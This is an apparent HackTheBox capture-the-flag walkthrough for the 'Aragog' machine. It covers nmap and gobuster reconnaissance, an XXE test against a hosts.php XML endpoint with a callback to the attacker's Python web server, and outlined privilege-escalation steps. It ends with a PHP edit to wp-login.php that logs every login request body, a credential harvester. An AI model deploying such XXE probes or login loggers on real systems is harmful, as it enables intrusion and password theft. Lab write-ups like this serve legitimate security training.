HackTheBox - Aragog Walkthrough


1. Recon and Information gathering

Machine name: Aragog
OS: Linux


nmap -A -oN base.nmap

Nmap scan report for
Host is up (0.13s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  5 14:34:23 2018 -- 1 IP address (1 host up) scanned in 12.46 seconds


SSH is running on default port with no additional interesting information from the scan. On connecting we can see that it only takes ssh key authentication and doesn’t accept passwords:

ssh root@
root@ Permission denied (publickey).


Quick check on the version doesn’t show any vulns available, but we have a file and anonymous access to that file:


So far that’s all we have/can do with the ftp so we continue with the exposed services.


Fist let’s see what is available at / on the webserver:

curl -s | grep title
<title>Apache2 Ubuntu Default Page: It works</title>

Nothing interesting, just the default webpage for Ubuntu’s Apache installations. Next step - dirbusting. We’ll start with a small list and some basic extensions - if we don’t find anything interesting we can expand the search with bigger wordlist:

gobuster -w /usr/share/wordlists/dirb/common.txt -u -t 50 -x txt,php,xml

Gobuster v1.4.1              OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .txt,.php,.xml
/hosts.php (Status: 200)
/index.html (Status: 200)

Only one php file found with that list. The content:


There are 4294967294 possible hosts for 

Looking at the output and seeing 4294967294 and possible hosts should lead our train of thought to ip4 addresses (at least did that for me):

IPv4 uses 32-bit IP address, and with 32 bits the maximum number of IP addresses is 232—or 4,294,967,296.

Adding one IP for broadcast and one for network results in the same number of hosts. Checking back our test.txt and seeing a network mask there should be our next pointer - let’s use them together:

curl -X POST -d @text.txt

Which calculates the possible hosts for the provided netmask:

curl output

So we now know how to interact with the application. Since we have XML input our first check should be for possible XXE (XML External Entity)

2. Vulnerability Testing

As a start let’s run a python webserver on our attacking machine:

python -m SimpleHTTPServer 80
Serving HTTP on port 80 ...

And let’s create a file with our payload for testing the app - we’ll call it xxe_test.xml:

<!DOCTYPE foo [ <!ELEMENT foo ANY >

Send it to the webapp via curl request:

curl -X POST -d @xxe_test.txt

check our python server and see if we have a callback:

There are 4294967294 possible hosts for - - [29/Jul/2018 03:07:19] "GET / HTTP/1.0" 200 -

Bingo! We have a way of executing things on the remove machine. Let’s see what exactly is available to us.

  • XXE testing
  • XXE fixes/avoidance

3. Exploitation

  • XXE exploitation
  • Gaining user access

4. Privilege Escalation

  • Internal enumeration
  • Wordpress
  • Permissions
  • Getting admin credentials through logging Wordpress login form
  • r00tz

Edit wp-login.php:

vim /home/myserverlab/public_html/logger/wp-login.php


$entityBody = file_get_contents('php://input');
file_put_contents('admin.logger', $entityBody . "\n");